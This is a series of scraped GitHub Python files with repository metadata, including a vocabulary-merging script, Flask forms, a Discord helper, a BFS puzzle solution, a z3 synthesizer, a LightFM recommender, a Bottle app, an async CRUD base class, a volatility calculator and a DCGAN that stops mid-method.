path_vocab_train = pd.read_csv(os.path.join(train_path, 'paths.csv'))
# 测试集
token_vocab_test = pd.read_csv(os.path.join(test_path, 'tokens.csv'))
node_vocab_test = pd.read_csv(os.path.join(test_path, 'node_types.csv'))
path_vocab_test = pd.read_csv(os.path.join(test_path, 'paths.csv'))
need_merge = args.merge_vocab
method = 'outer' if need_merge else 'left'
node_vocab_map = vocab_merge(node_vocab_test, node_vocab_train, on=['node_type'], method=method)
token_vocab_map = vocab_merge(token_vocab_test,token_vocab_train, on=['token'], method='outer')
node_dict = map2dict(node_vocab_map)
token_dict = map2dict(token_vocab_map)
path_vocab_test = path_vocab_test.apply(lambda row: transform_paths(row, node_dict), axis=1)
path_vocab_map = vocab_merge(path_vocab_test, path_vocab_train, on=['path'], method='outer')
path_dict = map2dict(path_vocab_map)
path_context_test = []
for root, dirs, files in os.walk(test_path):
for f_name in tqdm.tqdm(files):
if 'path_contexts' in f_name:
f_path = os.path.join(root, f_name)
with open(f_path) as f:
f_list = f.readlines()
for row in f_list:
path_list = row.split()
id = path_list[0]
paths = path_list[1:]
new_paths = []
for path_item in paths:
new_path = transform_paths_content(path_item, token_dict, path_dict)
new_paths.append(new_path)
new_row = ' '.join([str(id)] + new_paths) + '\n'
path_context_test.append(new_row)
if need_merge:
path_context_train = []
for root, dirs, files in os.walk(train_path):
for f_name in tqdm.tqdm(files):
if 'path_contexts' in f_name:
f_path = os.path.join(root, f_name)
with open(f_path) as f:
f_list = f.readlines()
path_context_train = path_context_train + f_list
path_context_train = path_context_test + path_context_train
f = open(os.path.join(out_path, 'path_contexts.csv'), 'w')
f.write(''.join(path_context_train))
f.close()
save_vocab(node_vocab_map, os.path.join(out_path, 'node_types.csv'),
columns=['node_type', 'id'])
save_vocab(token_vocab_map, os.path.join(out_path, 'tokens.csv'),
columns=['token', 'id'])
save_vocab(path_vocab_map, os.path.join(out_path, 'paths.csv'),
columns=['path', 'id'])
else:
f = open(os.path.join(out_path, 'path_contexts.csv'), 'w')
f.write(''.join(path_context_test))
f.close()
save_vocab(path_vocab_map, os.path.join(train_path, 'paths.csv'),
columns=['path', 'id'])
save_vocab(token_vocab_map, os.path.join(train_path,'tokens.csv'),
columns=['token', 'id'])
if __name__ == '__main__':
main()
| miaoshenga/APathCS | scripts/share_vocab.py | share_vocab.py | py | 6,662 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "pandas.isna",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "pandas.isna",
"line_number": 46,
"usage_type": "call"
},
{
"api_name": "pandas.isna",
"line_number": 75,
"usage_type": "call"
},
{
"api_name": "argparse.ArgumentParser",
"li... |
29050704231 | from flask.ext.wtf import Form
from wtforms import StringField, BooleanField
from wtforms.validators import DataRequired
class LoginForm(Form):
    """OpenID sign-in form with a "remember me" toggle."""
    openid = StringField('openid', validators=[DataRequired()])
    remember_me = BooleanField('remember_me', default=False)
    def __init__(self, *args, **kwargs):
        """Construct the form with CSRF protection forcibly disabled."""
        # NOTE(review): csrf_enabled=False bypasses CSRF checks -- confirm
        # this is intentional outside of testing.
        kwargs['csrf_enabled'] = False
        super(LoginForm, self).__init__(*args, **kwargs)
class SearchForm(Form):
    """Person-search form: free-text names, date of birth and identifier."""
    firstName = StringField('firstName')
    surname = StringField('surname')
    dob = StringField('dob')
    identifier = StringField('identifier')
    def __init__(self, *args, **kwargs):
        """Construct the form with CSRF protection forcibly disabled."""
        # NOTE(review): csrf_enabled=False bypasses CSRF checks -- confirm
        # this is intentional outside of testing.
        kwargs['csrf_enabled'] = False
        super(SearchForm, self).__init__(*args, **kwargs)
| AndreasThinks/ASB_DB | app/forms.py | forms.py | py | 722 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "flask.ext.wtf.Form",
"line_number": 5,
"usage_type": "name"
},
{
"api_name": "wtforms.StringField",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "wtforms.validators.DataRequired",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "w... |
23252374328 | """Convenience functions go here"""
import discord
# region Constants
is_modified = False # Set this to True if you modify the code for your own use.
GITHUB_URL = "https://github.com/Mehehehehe82/BotInnit"
postmessage = f"It's open source, check it out on github! {GITHUB_URL}"
# endregion
# region Functions
async def prettymsg(ctx,
                    msg: str = "Sample text be like bruh",
                    Header: str = "Hey!",
                    RawText: str = "", # Good for mentioning people
                    ThumbnailURI: str = "https://cdn.discordapp.com/avatars/783773656227512331/e6db612b2f469225fda5522f3e915d7a.webp",
                    colorHex: int = 0xb86767
                    ):
    '''Send a decorated embed to `ctx`.

    msg/Header/colorHex/ThumbnailURI style the embed; RawText is sent as
    the plain message content (mentions only ping from there, not from an
    embed).  The footer credits the author and the source repository,
    adjusted when `is_modified` is set.
    '''
    embed=discord.Embed(title=Header, description=msg, color=colorHex)
    embed.set_thumbnail(url=ThumbnailURI)
    if is_modified:
        embed.set_footer(text=f"Based on the Discord bot created by hyperboid. {postmessage}")
    else:
        embed.set_footer(text=f"Discord bot created by hyperboid. {postmessage}")
    await ctx.send(RawText, embed=embed)
# endregion
| polypoyo/DiscordBot | conv.py | conv.py | py | 999 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "discord.Embed",
"line_number": 17,
"usage_type": "call"
}
] |
13780268319 | import sys
from collections import deque
# BOJ 1926: count the paintings (4-connected components of 1s) on an
# n x m grid and report the size of the largest one.
n, m = map(int, sys.stdin.readline().strip().split())
paper = [list(map(int, sys.stdin.readline().strip().split())) for _ in range(n)]
visited = [[0 for _ in range(m)] for _ in range(n)]
max_pic = 0  # size of the largest painting found so far
pic_cnt = 0  # number of paintings
for i in range(n):
    for j in range(m):
        if not visited[i][j] and paper[i][j] == 1:
            # BFS flood-fill of the component containing (i, j).
            q = deque([[i, j]])
            visited[i][j] = 1
            cnt = 0
            while q:
                x, y = q.popleft()
                cnt += 1
                for n_X, n_y in [[x - 1, y], [x + 1, y], [x, y - 1], [x, y + 1]]:
                    if 0<= n_X < n and 0<= n_y < m:
                        if visited[n_X][n_y] == 0 and paper[n_X][n_y] == 1:
                            visited[n_X][n_y] = 1
                            q.append([n_X, n_y])
            max_pic = max(max_pic, cnt)
            pic_cnt += 1
print(pic_cnt)
print(max_pic)
| Yangseyeon/BOJ | 03. Gold/1926.py | 1926.py | py | 922 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "sys.stdin.readline",
"line_number": 3,
"usage_type": "call"
},
{
"api_name": "sys.stdin",
"line_number": 3,
"usage_type": "attribute"
},
{
"api_name": "sys.stdin.readline",
"line_number": 4,
"usage_type": "call"
},
{
"api_name": "sys.stdin",
"li... |
71749583783 | from z3 import substitute, Not, And
from collections import defaultdict
class Synthesizer:
def __init__(self, clauses, model, all_vars, step, prop, hist, length):
cond = hist.pc_ante[0]
self.all_clauses = set(clauses)
self.safe_clauses = set(clauses)
self.trigger_clauses = set(clauses)
self.model = model
self.prop = prop
self.all_vars = all_vars
sbst = self.get_subs_for_var_to_next_var()
self.safe_clauses.update(
Not(substitute(interp, sbst)) for interp in list(self.safe_clauses)
)
for i in range(0, step):
self.check_clauses_on_model_and_step(
self.safe_clauses, i, negate=True, cond=cond
)
self.check_clauses_on_model_and_step(
self.safe_clauses, step, negate=False, cond=cond
)
self.check_clauses_on_model_and_step(
self.trigger_clauses, step, negate=False, cond=cond
)
for i in range(step + 1, length - 1):
self.check_clauses_on_model_and_step(
self.trigger_clauses, i, negate=True, cond=cond
)
self.used_vars = defaultdict(int)
self.used_funcs = defaultdict(int)
self.used_consts = defaultdict(int)
inner_prop = self.prop.consequents[-1].children()[0].children()[0]
self.setup_ranking_dicts(inner_prop)
self.rank_clauses()
def check_clauses_on_model_and_step(self, clauses, step, negate, cond):
old_clauses = list(clauses)
clauses.clear()
for cur_clause in old_clauses:
sub_clause = substitute(
substitute(And(cur_clause, cond), self.get_subs_for_cex_step(step)),
self.get_subs_for_next_cex_step(step + 1),
)
eval_bool = self.model.eval(sub_clause)
if negate and not eval_bool or not negate and eval_bool:
clauses.add(cur_clause)
def get_top_interpolant(self):
try:
top = sorted(self.ranking)[-1]
top_interp = self.ranking[top]
if top_interp in self.trigger_clauses:
return "trigger", top_interp
else:
return "safe", top_interp
except IndexError as e:
return "trigger", list(self.all_clauses)[-1]
# def generate_interpolants(self):
# print("TRIGGERS:")
# for tc in self.trigger_clauses:
# print(tc)
# print("SAFE:")
# for sc in self.safe_clauses:
# print(sc)
# ranking = self.rank_clauses()
# print(f"Prop: {self.prop.consequents}")
# pprint.pprint(ranking)
# for rank in reversed(sorted(ranking)):
# interp = ranking[rank]
# if interp in self.safe_clauses:
# yield "safe", interp
# else:
# yield "trigger", interp
def setup_ranking_dicts(self, cur_prop_term):
if cur_prop_term.children():
self.used_funcs[str(cur_prop_term.decl())] += 1
for child in cur_prop_term.children():
self.setup_ranking_dicts(child)
else:
str_term = str(cur_prop_term)
if self.is_var(str_term):
self.used_vars[str_term] += 1
else:
self.used_consts[str_term] += 1
def is_var(self, term):
for var in self.all_vars:
if var.match_name(term):
return True
return False
    def rank_clauses(self):
        """Build ``self.ranking``: a dict mapping a numeric rank to a clause.

        Trigger clauses get their rank doubled so they tend to win when
        ``get_top_interpolant`` later takes the maximum key.
        """
        ranking = {}
        for clause in self.trigger_clauses:
            # prefer triggers
            # NOTE(review): get_rank() can be negative (it subtracts the
            # clause length), and doubling a negative rank makes a trigger
            # rank *worse*, not better -- confirm this is intended.
            ranking[self.get_rank(clause) * 2] = clause
        for clause in self.safe_clauses:
            # NOTE(review): clauses sharing a rank value silently overwrite
            # each other in this dict, so only one clause survives per rank.
            ranking[self.get_rank(clause)] = clause
        self.ranking = ranking
def get_rank(self, clause):
str_clause = str(clause)
rank = -1 * len(str_clause) # prefer shorter
for v in self.used_vars:
if v in str_clause:
rank += 20 * self.used_vars[v]
for f in self.used_funcs:
if f in str_clause:
rank += 15 * self.used_funcs[f]
for c in self.used_consts:
if c in str_clause:
rank += 10 * self.used_consts[c]
return rank
def get_subs_for_cex_step(self, step):
return [var.make_step_var_sub(step) for var in self.all_vars]
def get_subs_for_next_cex_step(self, step):
return [var.make_step_next_var_sub(step) for var in self.all_vars]
def get_subs_for_var_to_next_var(self):
return [var.make_cur_var_to_next_sub() for var in self.all_vars]
| cvick32/ConditionalHistory | src/synthesizer.py | synthesizer.py | py | 4,666 | python | en | code | 5 | github-code | 36 | [
{
"api_name": "z3.Not",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "z3.substitute",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "collections.defaultdict",
"line_number": 32,
"usage_type": "call"
},
{
"api_name": "collections.defaultdict"... |
37649351161 | '''
Recommendation Systems: the ML algorithm will learn our likes and
recommend what option would be best for us. These learning algorithms
become more accurate over time as they process more data
Types:
1)Collaborative Systems: predict what you like based on other similar
users have liked in the past
2)Content-Based: predict what you like based on what you have liked
in the past
eg:Netflix combines both approaches to predict your likes more accurately
APP: this script reads in a dataset of movie ratings and recommends new
movies for users
Dependencies: numpy, scipy, lightfm
lightfm: helps in performing bunch of recommendation algos,a great lib
to start with for building recommendation systems
'''
import numpy as np
#lets use the 'fetch_movielens' method from submodule datasets
#try diff methods to obtain diff results and compare the accuracy
from lightfm.datasets import fetch_movielens
from lightfm import LightFM
# Fetch the MovieLens dataset, keeping only interactions rated 4.0 or higher.
data = fetch_movielens(min_rating=4.0)
# `data` holds sparse interaction matrices; show their shapes/density.
print(repr(data['train']))
print(repr(data['test']))
# WARP (Weighted Approximate-Rank Pairwise) loss directly optimises the rank
# of positive items -- a good default for implicit-feedback recommendation.
# Training minimises this loss (model prediction vs desired output).
model = LightFM(loss='warp')
# epochs = number of passes over the training data;
# num_threads = parallel workers used during fitting.
model.fit(data['train'], epochs=30, num_threads=2)
def sample_recommendation(model, data, user_ids):
    """For each user id, print the movies the user already liked and the
    top movies the trained model recommends."""
    _, n_items = data['train'].shape
    # CSR form gives cheap per-row access to each user's interactions.
    interactions = data['train'].tocsr()
    labels = data['item_labels']
    for user_id in user_ids:
        # Titles this user has already interacted with (known positives).
        known_positives = labels[interactions[user_id].indices]
        # Score every item for this user, then order titles best-first.
        scores = model.predict(user_id, np.arange(n_items))
        top_items = labels[np.argsort(-scores)]
        print("Users %s" % user_id)
        print("     Known Positives:")
        for title in known_positives[:3]:
            print("         %s" % title)
        print("     Recommended:")
        for title in top_items[:3]:
            print("         %s" % title)
'''
print('Enter 3 random ids:')
idList = []
for i in range(3):
idList = int(input('ENTER:'))
'''
#enter in 3 random userids
sample_recommendation(model, data, [4, 45, 89])
'''
def main():
input('Enter 3 random user ids:')
idList = []
for i in range(3):
idList = int(input('ENTER:'))
sample_recommendation(model, data, idList)
if __name__ == '__main__':
main()
''' | ketanp05/MovieRecommendation | app.py | app.py | py | 3,004 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "lightfm.datasets.fetch_movielens",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "lightfm.LightFM",
"line_number": 37,
"usage_type": "call"
},
{
"api_name": "numpy.arange",
"line_number": 52,
"usage_type": "call"
},
{
"api_name": "numpy.a... |
19989928968 | # Import Python packages
import json
import os
# Import Bottle
import bottle
from bottle import Bottle, request, Response, run, static_file
import requests
from truckpad.bottle.cors import CorsPlugin, enable_cors
# Define dirs
# Directory containing this file; the built front-end lives under dist/.
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
STATIC_DIR = os.path.join(BASE_DIR, 'dist')
# App Config
bottle.debug(False)
app = Bottle()
@app.get('/')
def show_index():
    """Serve the app entry point (dist/index.html)."""
    return static_file('index.html', root=STATIC_DIR)
@app.post('/comment')
def post_comment():
    """Forward a user comment (and optional email) to the Kevalin events API.

    Raises requests.HTTPError (surfaced by bottle as a 500) when the
    upstream API rejects the event.
    """
    # request.json is None when the request carries no JSON body; the
    # original called .get() on it directly and crashed with AttributeError.
    body = request.json or {}
    comment = body.get('comment')
    email = body.get('email')
    payload = {
        'eventData': {
            'eventType': 'Comment',
        }
    }
    # Only include the optional fields the caller actually supplied.
    if comment:
        payload['eventData']['comment'] = comment
    if email:
        payload['eventData']['email'] = email
    res = requests.post('https://api.kevalin.io/v0/collections/SERVICE.R4R.COMMENTS/events',
                        headers={'Authorization': f'X-API-Key {os.getenv("KEVALIN_API_KEY")}'},
                        json=payload)
    res.raise_for_status()
# Static files route
@app.get('/<filename:path>')
def get_static_files(filename):
    """Serve any other path as a static asset from the dist/ build output."""
    return static_file(filename, root=STATIC_DIR)
# Allow cross-origin requests from rax.io subdomains only.
app.install(CorsPlugin(origins=['*.rax.io']))
# Run server
run(app, server='auto', host='0.0.0.0', port=8080, reloader=True)
| IDPLAT/tes-engagement | tes-engagement/app.py | app.py | py | 1,373 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "os.path.dirname",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 12,
"usage_type": "attribute"
},
{
"api_name": "os.path.abspath",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line... |
15867444691 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
from typing import Any, Dict, Generic, Type, TypeVar, NoReturn
from pydantic import BaseModel
from sqlalchemy import select, update, delete, and_
from sqlalchemy.ext.asyncio import AsyncSession
from backend.app.models.base import MappedBase
# Type variables binding the CRUD helper to a SQLAlchemy model and to the
# Pydantic schemas used for its create / update payloads.
ModelType = TypeVar('ModelType', bound=MappedBase)
CreateSchemaType = TypeVar('CreateSchemaType', bound=BaseModel)
UpdateSchemaType = TypeVar('UpdateSchemaType', bound=BaseModel)
class CRUDBase(Generic[ModelType, CreateSchemaType, UpdateSchemaType]):
    """Generic async CRUD helper parameterised by a SQLAlchemy model and the
    Pydantic schemas used for its create / update payloads."""

    def __init__(self, model: Type[ModelType]):
        self.model = model

    async def get_(
        self,
        db: AsyncSession,
        *,
        pk: int | None = None,
        name: str | None = None,
        status: int | None = None,
        del_flag: int | None = None,
    ) -> ModelType | None:
        """
        Fetch one row by primary key *or* by name (exactly one must be given).

        :param db: async session to query with
        :param pk: primary key (mutually exclusive with ``name``)
        :param name: name value (mutually exclusive with ``pk``)
        :param status: optional status filter, restricted to 0 or 1
        :param del_flag: optional soft-delete filter, restricted to 0 or 1
        :return: the matching row, or ``None``
        """
        # BUG FIX: the two assertion messages below were swapped in the
        # original -- "both missing" reported "both present" and vice versa.
        assert pk is not None or name is not None, '查询错误, pk 和 name 参数不能同时为空'
        assert pk is None or name is None, '查询错误, pk 和 name 参数不能同时存在'
        where_list = [self.model.id == pk] if pk is not None else [self.model.name == name]
        if status is not None:
            assert status in (0, 1), '查询错误, status 参数只能为 0 或 1'
            where_list.append(self.model.status == status)
        if del_flag is not None:
            assert del_flag in (0, 1), '查询错误, del_flag 参数只能为 0 或 1'
            where_list.append(self.model.del_flag == del_flag)
        result = await db.execute(select(self.model).where(and_(*where_list)))
        return result.scalars().first()

    async def create_(self, db: AsyncSession, obj_in: CreateSchemaType, user_id: int | None = None) -> None:
        """
        Insert one row built from the given Pydantic payload.

        :param db: async session
        :param obj_in: Pydantic model carrying the column values
        :param user_id: optional id recorded as ``create_user``
        """
        # (Return annotation fixed: the original declared NoReturn, but this
        # coroutine returns normally -- it simply returns None.)
        if user_id:
            create_data = self.model(**obj_in.dict(), create_user=user_id)
        else:
            create_data = self.model(**obj_in.dict())
        db.add(create_data)

    async def update_(
        self, db: AsyncSession, pk: int, obj_in: UpdateSchemaType | Dict[str, Any], user_id: int | None = None
    ) -> int:
        """
        Update one row, selected by primary key.

        :param db: async session
        :param pk: primary key of the row to update
        :param obj_in: Pydantic model or a dict of column values
        :param user_id: optional id recorded as ``update_user``
        :return: number of rows affected
        """
        if isinstance(obj_in, dict):
            # Copy so that adding update_user below never mutates the
            # caller's dict (the original wrote into it in place).
            update_data = dict(obj_in)
        else:
            # Only send fields the caller actually set on the schema.
            update_data = obj_in.dict(exclude_unset=True)
        if user_id:
            update_data.update({'update_user': user_id})
        result = await db.execute(update(self.model).where(self.model.id == pk).values(**update_data))
        return result.rowcount

    async def delete_(self, db: AsyncSession, pk: int, *, del_flag: int | None = None) -> int:
        """
        Delete one row by primary key -- physically when ``del_flag`` is
        None, otherwise as a soft delete (setting ``del_flag`` to 1).

        :param db: async session
        :param pk: primary key of the row to delete
        :param del_flag: None for a hard delete, 1 for a soft delete
        :return: number of rows affected
        """
        if del_flag is None:
            result = await db.execute(delete(self.model).where(self.model.id == pk))
        else:
            assert del_flag == 1, '删除错误, del_flag 参数只能为 1'
            result = await db.execute(update(self.model).where(self.model.id == pk).values(del_flag=del_flag))
        return result.rowcount
| fastapi-practices/fastapi_best_architecture | backend/app/crud/base.py | base.py | py | 3,602 | python | en | code | 96 | github-code | 36 | [
{
"api_name": "typing.TypeVar",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "backend.app.models.base.MappedBase",
"line_number": 11,
"usage_type": "name"
},
{
"api_name": "typing.TypeVar",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "pyda... |
7369258562 | from typing import Union
import pandas as pd
import numpy as np
from Functions.date_parser import parse_dates
from Functions.data_reader import read_data
def get_historical_volatility(main_df: pd.DataFrame,
                              period_start: Union[str],
                              period_end: Union[str, None],
                              lambda_factor: Union[None, float]):
    """Compute annualised historical volatility from a Date/Price frame.

    Returns a float on success, or an "ERROR: ..." message string on bad
    input.  With ``lambda_factor`` set, an exponentially-weighted (EWMA)
    scheme is used; otherwise all observations are weighted equally.
    """
    # Return error when start date is None
    if period_start is None:
        rate_of_return = "ERROR: Start Date is required"
        return rate_of_return
    # using defaults where passed value is none
    period_end = 'Latest' if period_end is None else period_end
    # Get parsed start and end dates
    start_date, end_date = parse_dates(period_start, period_end,
                                       main_df)
    # parse_dates signals an error by returning a message string instead
    # of a timestamp.
    if isinstance(start_date, str):
        volatility_val = start_date
        return volatility_val
    if pd.isnull(start_date):
        volatility_val = "ERROR: No data found prior to start date"
        return volatility_val
    # Filter data
    main_df = main_df.set_index('Date')
    main_df = main_df[(main_df.index >= start_date) &
                      (main_df.index <= end_date)]
    # Order by date
    main_df = main_df.sort_values(by='Date')
    # Compute performance (daily log returns); the first row is NaN from
    # shift() and is dropped below.
    main_df['Performance'] = np.log(main_df.Price / main_df.
                                    Price.shift())
    main_df = main_df[1:]
    # Equal-weight volatility (no lambda): annualised stdev of log returns.
    # (The comments on these two branches were swapped in the original.)
    if lambda_factor is None:
        main_df['Vol'] = (main_df['Performance'] -
                          main_df['Performance'].mean()) ** 2
        volatility_val = np.sqrt(((main_df['Vol'].sum() * 252)
                                  / main_df.shape[0]))
        volatility_val = np.round(volatility_val, 6)
    # EWMA volatility: the newest observations get the largest weights.
    else:
        main_df = main_df.sort_values(by='Date', ascending=False)
        main_df['Weight'] = (1 - lambda_factor) * lambda_factor \
                            ** np.arange(len(main_df))
        volatility_val = np.round(
            np.sqrt(
                ((main_df['Weight'] * main_df['Performance'] ** 2).sum()
                 * 252) / (main_df['Weight'].sum())
            ), 6
        )
    return volatility_val
def historical_volatility(maven_asset_code: str, price_type: str,
                          currency: str, period_start: list,
                          period_end: list,
                          lambda_factor: Union[None, float] = None
                          ) -> dict:
    """
    Compute annualised historical volatility for each (start, end) pair.

    :param maven_asset_code: asset code, e.g. 'SPY US'
    :param price_type: price series to use, e.g. 'PR'
    :param currency: not supported yet; must be None
    :param period_start: list of period-start specifiers
    :param period_end: list of period-end specifiers (same length)
    :param lambda_factor: optional EWMA decay factor
    :return: dict with a 'Volatility' list, one entry per period pair
    """
    # Currency conversion is not implemented yet.
    if currency is not None:
        raise NotImplementedError('ERROR: Currency is not supported')
    # read data
    price_df = read_data(maven_asset_code, price_type)
    # Both period lists must line up element-for-element.
    if len(period_start) != len(period_end):
        raise ValueError('ERROR: Ensure all passed list are '
                         'of same length!')
    volatilities = []
    for begin, finish in zip(period_start, period_end):
        try:
            volatilities.append(
                get_historical_volatility(price_df, begin, finish,
                                          lambda_factor)
            )
        except (Exception,):
            # Best-effort: a failed period yields None rather than aborting.
            volatilities.append(None)
    return {'Volatility': volatilities}
# #
# mvn_historical_volatility (SPY US, PR, , [1Y,2W,6M,3Q,95D,Inception],,0.9)
# maven_asset_code = 'SPY US'
# price_type = 'PR'
# period_start = ['1Y','2W','6M','3Q','95D','Inception']
# period_end = [None, None, None, None, None, None]
# # lambda_factor = 0.9
# #
# # result = historical_volatility(maven_asset_code, price_type, None,period_start, period_end, lambda_factor)
# # print(result)
# #
# result = historical_volatility(maven_asset_code, price_type, None,period_start, period_end)
# print(result) | fhashim/time_series_test | Functions/mvn_historical_volatility.py | mvn_historical_volatility.py | py | 4,342 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "pandas.DataFrame",
"line_number": 12,
"usage_type": "attribute"
},
{
"api_name": "typing.Union",
"line_number": 13,
"usage_type": "name"
},
{
"api_name": "typing.Union",
"line_number": 14,
"usage_type": "name"
},
{
"api_name": "typing.Union",
"l... |
37735076181 | from __future__ import division
import os
import time
import math
from glob import glob
import tensorflow as tf
import numpy as np
from six.moves import xrange
from ops import *
from utils import *
class DCGAN(object):
    def __init__(self, sess, input_size=28,
                 batch_size=64, sample_num=64, output_size=28,
                 z_dim=62, c_dim=1, dataset_name='default',
                 checkpoint_dir=None, sample_dir=None):
        """
        Args:
            sess: TensorFlow session
            input_size: The size of input image.
            batch_size: The size of batch. Should be specified before training.
            sample_num: Number of images generated when sampling.
            output_size: The size of the generated image.
            z_dim: (optional) Dimension of dim for Z. [100]
            c_dim: (optional) Dimension of image color. For grayscale input, set to 1. [1]
            dataset_name: Tag used to build the checkpoint directory name.
            checkpoint_dir: Directory checkpoints are saved to / restored from.
            sample_dir: Unused here; the sampling directory comes from the
                train() config instead.
        """
        self.sess = sess
        self.batch_size = batch_size
        self.sample_num = sample_num
        self.input_size = input_size
        self.output_size = output_size
        self.z_dim = z_dim
        self.c_dim = c_dim
        self.dataset_name = dataset_name
        self.checkpoint_dir = checkpoint_dir
        # Global step counter; overwritten from the checkpoint on restore.
        self.counter = 1
        self.build_model()
    def discriminator(self, image, reuse=False, train=True):
        """Conv net scoring a batch of images as real vs fake.

        Returns (sigmoid probability, raw logits)."""
        with tf.variable_scope("discriminator", reuse=reuse):
            #######################################################
            # TODO: Define discrminator network structure here. op.py
            # includes some basic layer functions for you to use.
            # Please use batch normalization layer after conv layer.
            # And use 'train' argument to indicate the mode of bn.
            #######################################################
            # conv stack: 32 -> 64 -> 256 feature maps, stride 2 each,
            # leaky-ReLU activations with batch norm after each conv.
            d = lrelu(conv2d(image, 32, 4, 4, 2, 2, name="d_conv1"), name="d_lrelu1")
            # self.d1_shape = d.shape
            d = lrelu(batch_norm(conv2d(d, 64, 4, 4, 2, 2, name="d_conv2"), train=train, name="d_bn2"), name="d_lrelu2")
            # self.d2_shape = d.shape
            d = lrelu(batch_norm(conv2d(d, 256, 4, 4, 2, 2, name="d_conv2_1"), train=train, name="d_2_1_bn"),
                      name="d_2_1_lrelu")
            # flatten, then two fully-connected layers down to a single logit
            d = tf.reshape(d, [self.batch_size, -1])
            # self.d2_flat_shape = d.shape
            d = lrelu(batch_norm(linear(d, 512, 'd_conv3'), train=train, name="d_bn3"), name="d_lrelu3")
            # self.d3_shape = d.shape
            out_logit = linear(d, 1, "d_fc4")
            out = tf.nn.sigmoid(out_logit)
            return out, out_logit
        #######################################################
        #                   end of your code
        #######################################################
    def generator(self, z, reuse=False, train=True):
        """Map latent vectors z to 28x28x1 images in [0, 1] via a
        fully-connected stem followed by two transposed convolutions."""
        with tf.variable_scope("generator", reuse=reuse):
            #######################################################
            # TODO: Define decoder network structure here. The size
            # of output should match the size of images. Image scale
            # in DCGAN is [-1, +1], so you need to add a tanh layer
            # before the output. Also use batch normalization layer
            # after deconv layer, and use 'train' argument to indicate
            # the mode of bn layer. Note that when sampling images
            # using trained model, you need to set train='False'.
            #######################################################
            # NOTE(review): the TODO above asks for a tanh output ([-1, 1])
            # but the code ends with a sigmoid ([0, 1]) -- confirm which
            # range the training data is scaled to.
            g = tf.nn.relu(batch_norm(linear(z, 1024, "g_fc1"), train=train, name="g_bn1"))
            g = tf.nn.relu(batch_norm(linear(g, 128*7*7, "g_fc2"), train=train, name="g_bn2"))
            g = tf.reshape(g, [self.batch_size, 7, 7, 128])
            # upsample 7x7 -> 14x14 -> 28x28
            g = tf.nn.relu(batch_norm(deconv2d(g, [self.batch_size, 14, 14, 64], 4, 4, 2, 2, name="g_deconv3"),
                                      train=train, name="g_bn3"))
            g = tf.nn.sigmoid(deconv2d(g, [self.batch_size, 28, 28, 1], 4, 4, 2, 2, name="g_deconv4"))
            return g
        #######################################################
        #                   end of your code
        #######################################################
    def build_model(self):
        """Define placeholders, the D/G graphs, and the two loss terms
        (saved as self.d_loss and self.g_loss)."""
        #######################################################
        # TODO: In this build_model function, define inputs,
        # operations on inputs and loss of DCGAN. For input,
        # you need to define it as placeholders. Discriminator
        # loss has two parts: cross entropy for real images and
        # cross entropy for fake images generated by generator.
        # Set reuse=True for discriminator when calculating the
        # second cross entropy. Define two different loss terms
        # for discriminator and generator, and save them as
        # self.d_loss and self.g_loss respectively.
        #######################################################
        # Inputs
        self.x = tf.placeholder(tf.float32, shape=[self.batch_size, self.input_size, self.input_size, self.c_dim],
                                name='real_images')
        self.z = tf.placeholder(tf.float32, shape=[self.batch_size, self.z_dim], name='z')
        # Gaussian White noise for training
        # NOTE(review): the stddev reads self.counter at graph-construction
        # time (always 1 here), so the noise level is fixed for the whole
        # run rather than decaying as the counter grows -- confirm intent.
        g_noise = tf.random_normal(shape=self.x.shape, mean=0, stddev= 1 / (self.counter**0.5))
        # Real data with Discriminator
        D_real, D_real_logits = self.discriminator(self.x + g_noise, train=True, reuse=False) #
        # Fake data from Generator with Discriminator
        G = self.generator(self.z, train=True, reuse=False)
        D_fake, D_fake_logits = self.discriminator(G, train=True, reuse=True)
        # Loss of Discriminator
        # (one-sided label smoothing: real labels are 0.7 instead of 1.0)
        d_loss_real = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=D_real_logits,
                                                                             labels=tf.ones_like(D_real) * 0.7))
        d_loss_fake = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=D_fake_logits,
                                                                             labels=tf.zeros_like(D_fake)))
        self.d_loss = d_loss_real + d_loss_fake
        # Loss of Generator
        self.g_loss = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=D_fake_logits,
                                                                             labels=tf.ones_like(D_fake)))
        # Test
        # Sampling graph: generator in inference mode (train=False).
        self.x_fake = self.generator(self.z, reuse=True, train=False)
        #######################################################
        #                   end of your code
        #######################################################
        # define var lists for generator and discriminator
        t_vars = tf.trainable_variables()
        self.d_vars = [var for var in t_vars if 'd_' in var.name]
        self.g_vars = [var for var in t_vars if 'g_' in var.name]
        self.saver = tf.train.Saver()
    def train(self, config):
        """Train the GAN on MNIST using the hyper-parameters in *config*
        (epoch, learning_rate, beta1, batch_size, train_size, dirs)."""
        # create two optimizers for generator and discriminator,
        # and only update the corresponding variables.
        self.sample_z = np.random.uniform(-1, 1, size=(self.batch_size, self.z_dim))
        # Discriminator learns at 1/5 of the generator's learning rate.
        d_optim = tf.train.AdamOptimizer(config.learning_rate / 5, beta1=config.beta1) \
            .minimize(self.d_loss, var_list=self.d_vars)
        g_optim = tf.train.AdamOptimizer(config.learning_rate, beta1=config.beta1) \
            .minimize(self.g_loss, var_list=self.g_vars)
        try:
            self.sess.run(tf.global_variables_initializer())
        except:
            # fallback for older TF versions
            tf.initialize_all_variables().run()
        # load MNIST data
        mnist = tf.contrib.learn.datasets.load_dataset("mnist")
        data = mnist.train.images
        data = data.astype(np.float32)
        data_len = data.shape[0]
